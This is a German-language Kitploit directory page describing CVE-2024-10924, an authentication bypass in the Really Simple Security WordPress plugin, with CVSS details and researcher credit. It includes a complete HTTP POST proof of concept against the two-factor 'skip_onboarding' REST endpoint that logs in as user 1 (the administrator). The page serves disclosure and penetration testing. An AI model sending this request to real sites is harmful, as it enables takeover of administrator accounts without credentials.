Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10924 — Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentifizierungsumgehung | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-10924
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubrandomrobbiebf/cve-2024-10924

CVE-2024-10924

Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentifizierungsumgehung

Repository anzeigen
41vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10924

Really Simple Security (Free, Pro und Pro Multisite) 9.0.0 – 9.1.1.1 – Authentifizierungsumgehung

Beschreibung

Die Really Simple Security (Free, Pro und Pro Multisite) Plugins für WordPress sind in den Versionen 9.0.0 bis 9.1.1.1 anfällig für eine Authentifizierungsumgehung. Dies ist auf eine fehlerhafte Fehlerbehandlung bei der Benutzerüberprüfung in den Zwei-Faktor-REST-API-Aktionen mit der Funktion 'check_login_and_get_user' zurückzuführen. Dadurch können nicht authentifizierte Angreifer als jeder vorhandene Benutzer der Website, z. B. als Administrator, einloggen, wenn die Einstellung "Zwei-Faktor-Authentifizierung" aktiviert ist (standardmäßig deaktiviert).

root@kitploit:~
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE	CVE-2024-10924
CVSS	9.8 (Critical)
Publicly Published	November 14, 2024
Last Updated	November 14, 2024
Researcher	István Márton - Wordfence

POC

root@kitploit:~
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90

{
    "user_id":1,
    "login_nonce": "231231231",
    "redirect_to": "/wp-admin/"
}

Tool herunterladen